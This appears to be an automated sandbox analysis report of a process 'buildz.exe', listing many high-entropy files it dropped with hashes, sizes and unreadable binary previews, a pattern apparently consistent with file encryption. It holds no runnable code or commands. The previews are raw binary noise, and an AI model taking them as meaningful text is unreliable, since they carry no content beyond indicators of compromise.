                        Preview:<?xml...Y..#85.....A...&%..#.z.4..q...b.fp`...6#......<..<..WG..C.M..'.e..6.@.O..:.E..n..^..e....R.&....+.(7..N.P.X.-.\.z...8\U.U.7-e..f..W..>$LJwM.,.I.j?U.`.X.....^@..........(.."....R..#....1.Gf...G...z.......T...W..g..*......+O".oHF!......l.{>......^.E...4.5.k.,l$.J....|h.....5../j.F..s-..ib-..E.|......912K04[Y.r.'V.6.t..0G.f.N....V.....T/.7*..c..f......X.v'..*.2P]@...g...;B..]7..2...yHD..........A...ZMh%..}.{g....Dp.WBRPN.c......h..DHG.. V.....L.[C*.,}>.eh.......r....\0..b..5yq...i....|.5Sk.......}.*.].....w...Yr.i.Q..Dr...q..0..D..\Y....;..cJ.&... F.~.R.N.&...~...V<#..V...<0.......!.I.W..o....V.}L....i...s.....-.!.W.lvIx`....L.....g.).O.H...f.x..OJY.x.>!.c.W...\...../2..X).{7..0..K..C*........Q.....l+...=..@.r...I..9G...7.P+.j(..7....V.&X.Z..........&.l.a.w>.M.Ze.m_7^.{....k..K+#R.........m"....2/..*!T<..*...G....H..........d..gI..3w..rP=>J......s6....G..={O'.......H.&..q...~...O?T.j..pq/..../.7dT{...BN...m.d.d"...+..>.u[q.vE.s=./u..+.........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1340
                        Entropy (8bit):7.831287005855865
                        Encrypted:false
                        SSDEEP:24:s+qv3X1twoIch5msTIfpRzs76yv/6vFFvm86JQJUPiHaPWaGbD:sXv/iOI3Q7pv/uiJQJUPkaPbUD
                        MD5:2A548A87537A95C4B297B7420E61F269
                        SHA1:B58E5437F98747F07BCAB95DF08F0110AA6D93CA
                        SHA-256:8DF567B37C54B109C0E2738F4169B0E3A557EAED3081C9BD9C6A9D6158B04C28
                        SHA-512:13EDE5B7A469063D58271C1519986A9E30C840680D3E7AF10BC5085FCC98ABD636D99A7975830908F65CFF5BDE728726F85BF9EAFF0CADF0FA7191C77EA3961B
                        Malicious:false
                        Preview:<?xmlPL-?.#.|...\...W[#20.g......H..'..C......D..;".tS...X.V..%J$.......j~.Mw.[.s........%t.....?(<z_...y.S0.t.'Zs6..|..=F.]..A...Au.?w...O.N.?...$..j_~1...L@7.....%....V.c.).\.?;.y.R...r;.W.@..]...&NDCq&..Ou.@...pq..>...&..E.Q.)p..e...;_.c.y......0s.'.N~.5.a..?.G.)Lw........=f.....L...!.N.~.'O..C..pH.I.b....t...fa..d. c....@[.J|L....E.....D~....|."E2.-H.'%...P....)Z..N......B....bS...........r....i.dJrO..,T}.l..V.....BU.....m.R..=.iV_.....\..o.X.......K.....\....@..(...+......n.*..[.>.>%85..Z....3.A.0p..Q.!...4......O....T.tZ....."IL........e.t .9.s|[9.........N-s..N,.E..#.8..O;.*....0Z(F...L.......*....7..p.f8...nC.._.S.#8>.....).._F.qdM..q..[.>... ;.K|..f..F...40.........W...`._\@.n...{>U.t.YC....-.?..U.j.1.b.....2..F...g.....,<%...ej....]...1.D.WU..].[..3U.>.....#...D....C..3.qC_.J@.a.a6-......<=.............x0..ji?.4;....V.<..|..~.~c..1.5e.R4K.3K...].7..T...m......GZ.2,fW.SLW..&.vx...X......<*.u.*m..ND6Q.......M.F=.G]OHpLj>.._.}[8.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1261
                        Entropy (8bit):7.828568152515608
                        Encrypted:false
                        SSDEEP:24:HCi0owFaflQLVe93m5hNbFWXErraL35xKCA/sdy7/Wk3WsaGbD:HCi0lM3QhBr2JcChg7uk38UD
                        MD5:1630AC78370EE88E1A9F941510FFCBD5
                        SHA1:5BC654CF9A2D31CC0BA00256972BEE45B469A27F
                        SHA-256:BE7E14AB532530447FD0C00A61DCFC4D0A186625273BE70F3B4718A4A6A20045
                        SHA-512:E35337C51FCD566F953FB4361D7320C0809BED39D056EA17F7C8E96CB1AAB4ED6D88D6D39E5EEF0A0D580090810F43B02D69337C6FE4634679936AB32ACD68EC
                        Malicious:false
                        Preview:<?xml>v.......1...eCY.F...k..'.h....k..Q.^..3o!w..u.n........+(.R...k...9D...........D.lL.rG.Ac..\.!..v...v|._...X...o.E.A.....$.q...Q.[..4oR.........\...B.*rvh.....+....s...z.......:`.6.......;. ......r..>..H...^.<*....]...~.3...zO....mA.;..;......X<....8..+A.2>..Q..A.}...le.Y...+.b5.......E.5..q..(.$.../....<7..).n.K..o.WT....6...R$.?8.v...".Ak..\...=.F*.I.R.O_...N...7Q..GK......;a..a.c.Z..'......6\\..G..7N,M/..~.......m.mQ.3/jz...u..........f..Pm......@.AC.P...p.}.j1._,pi.=4.........=;\...fl.q..I.....v..LC....I4.=.K..."..)...O.8....;...M,)....k0...z.T...sg..M..!.....[B4..^&7E..7r..6v.v....Q..D.V..b..a.[k......-E....Cu..+."8 .:"/..a>3....S.).|...mD..L...Q&9.....S..Wt..,.$..n......h...1.c^.....P.o..W..,l.m.>.iW...J..@.."9....O....F\.a..6....j..t..y..I...l....-..C....C...M.j..H..K.Y....m.UU.K. ...7.D..S.@..$...p6RP}Qx.HM.....a.Q..O.r/.#/\..o..i.R?.s.:.7.]...5....x7.....w.~HY.^........G..[.2..d...H....;.;E...M...wc...._s@..s...W...j.3.k...,.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1268
                        Entropy (8bit):7.847111229214633
                        Encrypted:false
                        SSDEEP:24:6qOYPGkyaT2At20mEnLonWgCb1gmOcR4/dXIqO01SXQngYBP0gmGbD:6qOYPGkHT2C20CjCb1A2WO01SX3YBP0W
                        MD5:BBB31AE44921C8261AF6429FA96F3A0D
                        SHA1:3FFD239188270A2E8FA8B79F104424B78F6C83A6
                        SHA-256:54567AC07BA635A16EAB5571B05E36D5782A7D4AD7CFC5C7E2B146CDD08AD784
                        SHA-512:FE114D8DABA5C17A7472AC08FB0015E8F2B8550CA112BCADD1F7EFF7E9055D719D081A0382522A2DC0932C55EF98F28372D6ED0D8DA962D263C73B46E41C54AF
                        Malicious:false
                        Preview:<?xml.(.....Y.h.Zv....9E.Yy.'........./4.S.H.t..d.i....g...k=.\S.....C...1v*WH..<.P....)FM.../..Q.E.Y.]..L..E`0.....E.3......|.0....x$Zb....J/..5.O8L.+....h.T.;...j....q.f.p=..7sPd.....8..Y..~i.M.m|J}.!....S.J8.*'.h..W?....|.O..?....E.G.i.._.5..Gy.......Oa}...(..Q.R.....>....x..a..Q..[...sa2..c..q..2,+....4^..{.H.1.....lxv..I}.LV.T.X.].c.I"....R.Vj.].c.em..=}..U*5..&St.V..@10...X5..dy..F0h5.u..0...W.K..1...[6......#.......^.y....,...N.4..p.C..D.Q..]..t...7HG.H?.\..|".... g).B#..;...B.../Aff=iUr.\.a..aV./.&.>...`.,..]MX..W...b...........=..]>..2 ...;.n.X...Q.~.+.i..a(U#H.....u... ../..uf...f..$...o....E...*...[.F....RU.rez.AM..{5.c.~.m.Z|..n;.G.4W.aEz.Nj&D .h.kW.!....b.....o.....r...j..8)Z&,.m..=.0. m.{.Qa..J....(M..G.>.#..v..X..\.3%....2a[..g...>F...c.1..G..q.&v.FB..l...{.....G...v.9@....+ic.A......(.{.Xim#c{aN.Av.! ....`..i@.`.%[.w?..........P...D.#./....W....V..9a4.O7..,...".j?J..2.T....:...........Zd......c.Z!Q......?.&...t.D..;.F6.....imr.......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1815
                        Entropy (8bit):7.89924272406574
                        Encrypted:false
                        SSDEEP:48:06QRRRI/eRs34YPVsEUHtNvxjHHS3i14AoYLRejPAzUD:0TR35+shvxjnS3A4ATojPAzA
                        MD5:978C0ED590EF0920F3981F60BDDB3930
                        SHA1:46AF705C40CCFC4FE1486BEF40AE85439C2D2D6B
                        SHA-256:33617CDB06D3E3C2F87090DA9681524C723DFC1B9DF435772C45C7232F424286
                        SHA-512:C284D1F26A8C9B9E644F0ED197932D7D0765963E19D1DA05FF197D0E1971766A506CBDA69683ACA5165C3C44BE71BBCAFD7F8A2FF8B0F53938AAAB35A0F11574
                        Malicious:false
                        Preview:<?xml.[.z.j.`..]..../.........L....#.C...[.....!..0;I.(....8....P...8G.6.....|.j?I...?...T=vn...Z#..J..........$.-GZp...;.(..9..;... 4.+..)..Hx..x.O;..!V.../f..-..sip..."...U....P.v.....1.kE"..../&W@.k7..N..Ha)g.Y...*4......O...$........T..!.vyFA.F*....a.. ....Q6.y.F....<^'...b%..Tj...D..f... .g..^.~......#.8[M....oI.I(.....#...N..X..... t sF..f..G9!r.E.=Q..}5.K;..f.......Z.F~..H.&no2r.h`..r....==...<....b..c....b.O..tbRH...^.m.....;.V.]..;...c.../7.].s.Ik......L.....~Y.U.......C.e.H....k...M.V;...8....7ne.....(.....'!.]...C.H.Ac$6]...2`..C\..j.o..4S.3.../....e..L..2.......[U.l!.`u.^.tu......(b.38..P\.r...oN..4....I....6..+..7c>.....{..V=....E..z..WC..rJ.K.S.LG'.\._QHu<]...X..........%.....$.t.cX..R....s..!zE.X.=..!.e....~...........=\..X.....yT......Z.Iy/......c./.d"".iC%K..mCY...a.g.9x!.+."y..:....2.>......A..d.(U.q..4^q..."w.(.O.^...>...I..H....&..3..4P......9t....f..0]\....BT.leDAsKR..a.L4.d@O..+....\&3Y......U.s..k.....#lc..i...9...Et
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1004
                        Entropy (8bit):7.795934543552246
                        Encrypted:false
                        SSDEEP:24:IdQF1g1mvHqqx6D+aqBQvgELbyl9dSjPlU4KouP7BPA8t5EGbD:gQLg0HaDMuXcGjPW4KoqBPA8jEUD
                        MD5:13DDE0924BB9FAF301BD588737C02548
                        SHA1:F6EEEDE89AB767F57A63822003E1BD8C9AF31C36
                        SHA-256:53C23C9B543BB9B8ED3BCACAE9B036BD5FC7129F9007DF4D03B15DA1D910BE23
                        SHA-512:FFFE154BDADA3EB38CEC81C478FF3347E8D9B80598F51C8D036AFFB1E5B55A7A3854DEA65099AA5E8A92FF9BEC355BFB5FBA95ABAD6EB7205415B65C39C412E8
                        Malicious:false
                        Preview:<?xmlu.}...[.3E o.>..F[.....f..^A:,9..k4...../.Nv..>...8....\.\.xvg...b'.....$H."O.M}..}.....D.O9$.l,....._K...l.Y.C.(e... ......\.fu....,.....N...s.....n.......\..0/.4..-...E..T,...Y.2.O+2H..`3W.m.[a.c.."......<...P.G/.....$e>..%$.....b...........bz{m.....Y7.*..f...8...O..%o......0.CeJ_[..{....y.?G.z..gZ.N.&./$..Y.Fc....w3R>..>...^l5...s..J..x.....r..9_8...-y..>...=........I.....t./.j.u...\..sS2..C.L.....j.C.(..Ttw....."p../e.q@.b..YX...s.].bJ:...g ..i..].+...........u..'f...-'..Z~...g..[...L...E.>GuYS..en)>.N.mb..0......"g....AirS...X.M.>....G&:o".dJ.y B....*..._ 52EQep...@..f?..4U.X....l...........y. ..aj.|.^.w.j.4.|%c:r.....3....p.._".....0{G.1.s....*.rd...\I._O..d.e:...._#tX....[*7..h.{...I...*..oi.z..V.qHs...:>.....U....4..2.x1..[m.k.XB.&......:.-..'...B].....5w..?.`..!......."q.E".@.81..........vD...#Bv.6.........J}N.N.>...j..*$........!..&.>...R..E..M..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1950
                        Entropy (8bit):7.898120452233007
                        Encrypted:false
                        SSDEEP:48:4oPyXDxeOjk6+XMVrwKaqgjduZGQyw8BnP+rR0+bj2x2b1/1u/IUD:4oPuDxeukfMVjafjdSE5Bf+baK/1zA
                        MD5:C8F860789EAF7FF2DAE667E4B52F9C3E
                        SHA1:5751F057C1D62B1CD35E65AC161C1D56459B93C4
                        SHA-256:3EF215C3C7A7676553D728FF9926AA2AE6E15605564F92C988E0213432EF8E25
                        SHA-512:BFF05E659FAA42AF1D04ED69047398278C00B90F3F7FB68B85CCB5E03C96A02CA55D7D569126B575D5F94C760AEEB91B27DD5F4290A3E476AAE9B2A80C5E8931
                        Malicious:false
                        Preview:<?xml..D/..+.5.e.k).2F ..po.N"....o.Y...1OG3.Y&.Z.%W......xKF...m.Z..6....t...u....C...t~..c........"J..5*6?....g..J.....}T.........=&...'0.$r:.A;Y6...:e..vtX....}:T.E...bZ,......Z..K......7x.;[G.c.0:..uy...S.co......'gJ......aCe..e...?....lv........JM).Z..^4H.......E....$$..d.P.../...(.s...{i....n.....xD...I/.....tQK..V`..+.3g*...iK...U.._..b.^y....PT...p|.Q.G.RI.z{.,.da..w=......^......-.i.D......1P.'k`...).RXn..ije...H..h..zG+(.[J.cI.....7....;.d...g.........oV.QY.4./..._.M.......<..v..w..al!...C...-..<..t...f...<...I.c.......5j..(...f..?Hq.>|.|pv.5._T..2.J.2.$..#..4.h}E...k........MltB.9.s....~..P.....W..D9`j..I..x.-..N...}j.{...*.F....<.XO..r.......x)=.5*..^.+.. z..u.../........j...CQr...PRal."3[..]...'b@B.2.cv..9.....2.I..dG..KG.A..<JC..7....xT..<r.....E....VS...O......B.f]....V...v(,.oN......P.i...r...NWY4P...a.,.d.K".....<.....@qK...86.87.|..tI...6;.n.... .n..5..-Y..{Ux*..U..J...m..~~....=.]u\.....P13..E.E..+*.Y.5M...oa...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4121
                        Entropy (8bit):7.955528275872922
                        Encrypted:false
                        SSDEEP:96:w6jY0pivRjjtT5RAxMrHStZgUPomQCJiNPA:weYHj1Ye3oLwNPA
                        MD5:96107172BC089C9DB9638B63F08645D3
                        SHA1:823A3B41A887D71638FAA4600105CF63825BA117
                        SHA-256:821F186D70AC35FDC27AE00C1F64ADD878652CAB4DCE9BF0E4BD15188CD17A34
                        SHA-512:073F461957F6857B14E22FF690A2CABC4AE2C6BFD7BFC7A82314908604D2B5063C905ECD4F1E7DA4F8BF17D65A02C24496FD80CD35B73D04308040F8EB65A12F
                        Malicious:false
                        Preview:<?xml....X.../v.....`|#R+$.C.u.rA0.L2yx...I..'S..N.....].M............k.Q.5...<..W.6+...t..>.RT*.Hy..A5.@@...w]XFi...j.'..p%.Q....?!..K....J.\B;c4...C..~...*.s....AG9......~#.(#7!...<TB.g.<...u...t.....x.+h.M...(':%..Ozc..j%...6Jw&.\LT.-.v>...5.5..(.....pr....... x..y........>....C..d>&rU.h..a5DO]...\..xp...h]....~..ylTV.!0.hgw.,.....t...6M.*=...P#..I7..#X.&R..,~u...R....|.....%..=.......;...cV.E....?b..m..).]p05..XMs.V......K...[..4.._/.,H..^W;.M..Q...~.B.1=+...9.cd..8,"N.y....uH(...OX~.*2v..L.#..EMr.,...z..ap.....D.V....:.E................e....b...oE.w.pN..wyxZj(....,....7.{....z(B.Z. .v../.^.....EE...<.....F]6.*].....o....i..m3G+ .K.....=.?...j.xL..p$>;...:...f....`c[.h....>....I....)h..@..)..j8*_(..~..1dA._[..+.G.q.....1.=]jUp....=.&..0B)s.f ........<^..M......e....d..$.m.RB.Ak.....+...Um5.........C^.....<o....X....Ru..WN.%u.~..}.k>Ei........Fy.,A.....c....1.eg.*..@......ik....q.hJ.....Q`.....'.L...4..L.......... J..>/f.qte..F.T..e..R
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1585
                        Entropy (8bit):7.870338424018587
                        Encrypted:false
                        SSDEEP:48:ytvWEJOsulFK0ahv3YiN3jBm1Pntd3avy6kTprwZUD:ytvWsunKpd3YiN3jKPntBqHswZA
                        MD5:8492A970C6BC03CE708D600A8020BD0C
                        SHA1:F2EB398B550953E881C20EA2E0D13E030579D356
                        SHA-256:E6F6D261516DBF50E36F3D38ECC1AB356BDA86726E4C3CC2DD510C796C3DAC0C
                        SHA-512:1AAED4ACCB99A075BCC69F96AA5DC7F92C7D7C7ECD8F5B40CF572D19D4FAE761DEBAFCF7CC597078CEF05F0F27A2DDAFE50B46641AE5CF243E1F2D01BCF3E698
                        Malicious:false
                        Preview:<?xml..Z..G.vD..[..w...|....Qm...\.......h.N.\wU.oT.E.W..Gd.D.0...>PP...s..:.L!0..>..`.`.P..`...;m..&|..h-.....|.....2.....e.4G*..Z..?..... ..7bJ.......?) ..4..(j.'..:.Z.w..s..3...'ux<}....8.k1.Iy.|I.^u...r"...VQ...(....;.SivE..3r.8zu....)...w..5...H.....+.WK*..;...{H.@...5.p.X........d..!....O......S.......we?..[...+-.#...q...e..|.....N.i..2:1.{.aQ....... ...[....>..{..r.S.K...t..u...jq.....j....HF.e..?..D...).V.[..`2.E&......yk.........W...q.;B..5..sy.:..r..S.Aq...gu[u.3.J....5....B...xHB}.}*..2..b...Pf..[...0.............Z..0U...gf.......[.0m|h._.Y...&..a]....a.k...:_.;..o....*.....(.;.S...H..q7Ze.9.z.+.y>...arOFe.d,}.#.E..v*.q=.I..f.."....?....m..f.9...-p....V...).T..DK8.........P.z..+M.^.h....<H:.i.q.....qp..a].NV.....g.\.V.r.S.W...&..-.ND...Uc...$.!W.]..xRS...+..c^.I7....7.,.....E..h-..=...Y....2D..5.[....S.?.47...BK.5d.B..A._...O.90..F...;3&..+:..N.*...-...8F......^...S.P.s.?.E#.BM.A..4=L..Js..'..............>L.Z
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1939
                        Entropy (8bit):7.900686269987404
                        Encrypted:false
                        SSDEEP:24:gX9IOB1UslZA3rwJY8rU33elyvFmFsSWq+J5dv9uSQycXgygkYyalkk+rLgfv14g:/Dsi+e3zcFsSvYt9u+Y3gkYyalfH6jUD
                        MD5:02299E23CA9EA907806D7206E3EEE9AB
                        SHA1:DB7622CC8FBB43349C429CC67C6094D501997A63
                        SHA-256:B9DDC15CF94A0B543B57962F38937737500DC68C623244C956F8CBABAB8A17BA
                        SHA-512:13804B5EA28605069FC4FC57259BC1BEA8CB8BFDA959BF0276198CA57D47B67EC04D3C385A5492BB44E7F297D4D26C34C36EC591DF107F6382CAD1E11AB91657
                        Malicious:false
                        Preview:<?xml.....C._...!.......2.cR....?.D".zT-..e......e.6u.....Vy..Z.v.8.....*...l......../....f.`.0..t...{...A.._DD..r......Z.&...i{...e........c.+o.,.....n.p.iQ....0...^.........4/...Ym(...ma.Xp.W..)j_|.......(......]T..,6.v...0..IM>7..s...{...v.o.s..@Y4a...i#i..<...a.e.D.%..G..t.PE...u...WA..Jw....c...{..f6.[%...'Xz$..{...%.).OEF.[2.>...;...O.........7..v...CS....}./...Ur.s.6..j...WS.{rc.o:..=...[p..(.....A..yA.o../sxg9.z..,a..+..{.q.)W...i....W..B.,..T...[z$..SP...C............(.G.m`!.......Z..i..Y?#..e6..~.N.(.}..x.Z"..{.oMv.1.....H.lP.vC.l..p_..bf.q...M.w..!.!..".N:I8..9....+.:~'...!..4......n.$Ji._..TO..<.K..K..{.R..r....}.@...l.........G.....JN...U.o.......c(xl.Mm.l.!N...D..[.......w.z..>...Hf=q.....b..-..t.C.xX.ht.u.T1.9..u.s....F.a...m@.AU\5....g *6..}...Q..S{.....pw.5M.8.>?...A..f.....bp.M..*kz......KEH..}...,/...i......s.]....Pi.....c...Y[.H.......S..X.X.2d..'....F.O.hg....@...(.z&[^{..z....".&.@.t...........".....4+..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3091
                        Entropy (8bit):7.93946701132607
                        Encrypted:false
                        SSDEEP:48:slWrSiP29yf/g/S0otye+K09Z1h/oKqU4eCavTRj4WTF1AqRm/aDMDsiETBUD:slW+iP29yf/aS05nH/YeTTRjJTF19FVA
                        MD5:DE121C7044B2EE10EDC4EBC1D4C24CB8
                        SHA1:9BBA1D1E182F69FB0D63A8085037C6AB2094617A
                        SHA-256:0C50A3D9FE84C7B5C0F455D332EB1AAC9F021105CBB8A1A85DBDB550C7E50C55
                        SHA-512:FF1AF4DE0DD59EA5336252DE136ED8B305B2A0B2440C6114755C5EBD274D4C0B8A453144A84473A67BFCDEA6A53A1E08A6D3711DFF1C2DBC04F8421C14DA23CA
                        Malicious:false
                        Preview:<?xmll.DHSW...N....z.Gq5..$..~6.!l.....c....;...Q.?.MZ.l......o.Y..,a...2..5h0.._...RAF...b~y.=..tG.a......<Q:...%.T\..u6lA..u.......9... ..)..h...[..7..."...YT.......\.W...-.}w...c..0V......N.....72-..|GW6.....W.l..d...g...1.?.\..:...n...-...r0..x.z....B..H....B.R..[..[..cN..N-..hs...T=c)+....k~.p..>..).2I:.^Vz.g..{x.p.....i..hw........6.!j..4.y.........r.|.C......!.....E...Ck.....(H|.. V_9..oj/.....".NFqb...q....<.....gLpE..*zF.F6....>.d..k`z...{C...Z.~....7ij.......].f.].......zi.2....Q....u..c/.v..n...,.a&..U.+.....1.W.V.t(.[...R..C[...|..$.^Oz......5...Gv?H0~g.n.'5..*V.$.......;t.u.].*.Z.e.....\.i[.O....ztn...=..VpW...*.].%rk.v[.m..8..*#.......$....[B8.,.. ...{D...)K...d...@.Pm.-}.....7t.......vy..1...2.l.h..Lf6.....|.....+....N.m.JO.q'.y..G..._..>M..0.N6..f..|...]s...O.hq}?.a..=I{.Q5.5.w.... ...q.(.y....:.DEN.....m...f..kT....P...Q...,..hNY ....`).....h.$.}w0.78...1....j..9s.?..=..N-:....e....^x...H&B..Pe.\..q.....5?..w..o....V..._...L.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):980
                        Entropy (8bit):7.777840053049257
                        Encrypted:false
                        SSDEEP:24:bLTxXpneBtnK4DJgfswKutP8iDGugzfM2GbD:bxXmR3Vg9KuFSuiPUD
                        MD5:DCD5E8E5C407AF1C1B4B611ACB6E4C7D
                        SHA1:3568DE9E06D89D1F24D7D545745284A03E3FE37B
                        SHA-256:BFD856EBC5BC4D49B239E68B454A5AB37B35AF0B5766A336BC9E4AE6B70EA581
                        SHA-512:091233FF36018DA942497384F37C379768FE875B1AB7FA7144EE3EC8B0734A8BAEE3A08603E893DA8DAB40CE43464CACCF571D06474A750A2BD5B79E0E690A2D
                        Malicious:false
                        Preview:<?xml......q:....r.t/..[.._wDd[b..xi!:n..cR"bK)lm......Q.....5d.C....dP\...8P.t.j.m.....i.lw.R....dLL..........#.g...~:..h....\..Y...r..o..S.b2.}...&~uP..ot......5.;+.:.Y[A..1.;.."X.L.yI.`.f.6..FWz,.JZ...W....].m..&2"n.}N=.C...C,.._:....W.SieOGt.....?.h..?...'.0/.%....Vz....e.&v.....'.r.z.W..dD....v..z..5R.`q....!._.......y.u.b.Q.g...(..T?...........w..0ZN.?...'.x.9.M...r........K....`..(..#.m......&U...6m[./....b.~.....Z...jI ..8.....~.:....F..L....~..D.c*.........h....;..P..iN5..d...e.....$. .(..F...f......jU....]_.f..K]...*E..6......O.....Q....U.lOX.;bt.Pd.3.......}._.ZK./..-...,.8..;w.o>v.yp,^.s.+.e|.3./.R.3.*.y.lF..N....d4Em*.t7.L...9xmb.X....);..@.A...... ..F.......5q.....i.n..8.DJ.0.x....C..NG.wo..}d...7....y.c.NQ....B.........n.D.X...S...DHj.8V&.0hh.!l.._.]...6.#.{#.>b.6G$4.T.LZ.....`pW..Xp...~...<.Y..Wu.'.1.R...J.......c.z...!./6.vf!..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2404
                        Entropy (8bit):7.930473616125993
                        Encrypted:false
                        SSDEEP:48:OZe5zrDRejIvctocZ8X7IfA4u7f2A03vEsvBnIVF+P4qUWt0S4mvYDXBC16aiSPu:KyvDRuIvoBZTYpB0/E8nf4UthArBg6ay
                        MD5:44F2751F3F1B5B7AA72D5D6984F1F8DC
                        SHA1:0530381051F77AC36D33C791B5B1E5E6BDA4B0A5
                        SHA-256:156A63988182DD205FFFC626BE4CC9C5BDC5BF50333F1D0D84C79BAB4868F666
                        SHA-512:E5904FBC33413A24ED65BBB6981D665B192F38E57791956F153CE8D291DCC91680B3371AA7FE2163DFF159C382BDA6AE5A2BB25E0D21A863B69D8D5B2FA06BC7
                        Malicious:false
                        Preview:<?xmlp......`.f.|...K^...D.......4.6 .>.mwl.%.3..kBzO.6.-..g......X...k0...=.\.(0. .n.II.`.-&h.r.f..J.U.}..........l<..d...O...@}.W....~.e1e.m.B....E....V.K`.S#....S5^..w.F.Zs.0..%...Ux......c..+..F...%fm.j......4T.]..+....u....C#.....0...w..68..).....Q].M...v_f.?.*@..th..s.......X..2..kX2g.^...$..&....O!N._e\.a[......"q. .s. .i...eK:IpU..F..>k..H|<<mZ}5v..}C.T..].4...,...|.H....._@....B..l.....Zp{....P)$2.}..z.2...>..."....4.}...g`..r!.@....S.o.r.<.T.Y...Eh.#.my)....i.v.Vt..N....cm5nD.;.v.......>..Q..uD..7.(...NH..6z..K.|..2.......9...Dy`...!.'HH.....D.......l....y.....m.e.(.U.. /m.K....G.B.n..eN.&...i...3......O.(....zJ.|..o..;..\.FC.C.%Q.Q...*D^p5..2..2..0k?.G.l'.&...K.].K.;=Z...W....Wg.[ ..G..$[E..Z..Z.T..U....+.dq<M..30..P('.]......g..zM1.".{. ...7#..............*..L....+>...."'...W.._9..l.+@>...[.>:.~.U...A&3......m.".@81..:.m.y9..."F..V.v+O|.-../u.!...cy..^...xNw.-f...|........BA....a.!~B..{...A4.f.k6...Lov..t|.H.X7..A
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3203
                        Entropy (8bit):7.946912518474775
                        Encrypted:false
                        SSDEEP:96:pvRheEsLWG8Mt1nbpGdv99KyMPIaVMgFlH3BjStA:nVsitW1nbpGd+yMPSgFlH3BWtA
                        MD5:08B949A115C40D62E7499A14356AD5B7
                        SHA1:D89C5AD0B7BE0E55708749905ADD29EDC20457BC
                        SHA-256:4941AC90718642B7ED4121CC51D3E99A8AA625D645FBA412C0D6A9C7BA568724
                        SHA-512:9CC19B621D8F73362306BDFBE2CC745046DD219E198FBB2807C2341DD773553A7199984F6883A4233B2598115D9EDAA56FE5C14AA1E09B2972D83EBA83063A4B
                        Malicious:false
                        Preview:<?xml....{"|l[..X....Sm..t`8/.........`6-..qGs.z.....R..<..K....L....!%?..7Y.8Z...k.<p...\.n.%.. ...x...h.$.5ko.......<W..u..1.....Z.B7...M#L.x....FG...W.}Jv"xz..X?p...9..$.....c...9IG9....O.......z.g.....O.g......k..S>.].lH..E..9..........T.g.##.7.bkSY...../[...@.8......~...[h.,.`H&n!.{.F.9......T(..]..$D.k.c..s.k.1...fmH....g.b..9...{..?.E...o9.J4._....7L...2...S.0.....X$...:.J.6.5.#.v.[...k.~.{qZI.....f.$.[.M.f;T......)........A6...U]....q6..~..h....h.o.9.&-9..?.&...'_.w.~.........+....*f@#O.*I..#rp*F...a.........}z-..*.....r.|,6-.'u,W`.G.dv.t...*.....p..S.....B...g.............zJW....}......8..B.Y..~3BG..Um2.?....%.:ag\y&.~..A-.;......:T.{..$P*....(.CA.kjS.....@...:Y.`@^...H..L.a..w.pX...\.|.ou.|gd......6...o..20...HLj.(..$*..@.9....{......,.7...3..q.....1..z.....L..NMmj.(ll...`.5}.X.....T...I.&...i...MT.H.N...;i`4n...+..M...d.4.E.....LxE..RqN....G..C".\..Ph.c.Q...S....D.....".`Q.."..]..Y.5.pe.....'.]...D....;%.s.....S.......J.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2512
                        Entropy (8bit):7.931661806655472
                        Encrypted:false
                        SSDEEP:48:g9TUyplgeD5M6E60uFc2mgK4KKaLgboSQdBPPxiq+Y9+XUDUD:4TUOlZ5j70uFcjJCa8bo7dxiPiWUDA
                        MD5:345A6E6375ED084518D3233693A55D81
                        SHA1:C23AD8B5EF75DB949E9CC35BF10A10E484807B7C
                        SHA-256:83622E0F109EF3DC1F9495C278DA305936D127A07A4D8D4CCCAE6B934CC2D5A2
                        SHA-512:85B726A2496FC719C4D72D28562462420449691457E755F0A0F44D045A59E7264286E69FABF92F7C89CA38799FC0298B7E54AD23ED522E97C391196B00B5BB98
                        Malicious:false
                        Preview:<?xml]8...Ds....*..<L.>9I.....o...|.b.?.0..(....Y.5.e,V.!Xx...>"t..{......C.]'....b.m....3..c.u....0..Cz^..4..1.B5K#...s/Pl...7..i...(...u.B.c.Y..O;B.+].K%~.......[..NC@..-$.......^p.M. .%ND....U_......na.S.~..M.$B5...{.].61..#....JC.uZj....5...~`.k.5|.Ut.....i....v.....NQ..e~}..V.D.....3..`U|.Ft.7.)...U."..L]..*......Z.".zH.......B."............KcEZ.u...f..6..tf.. 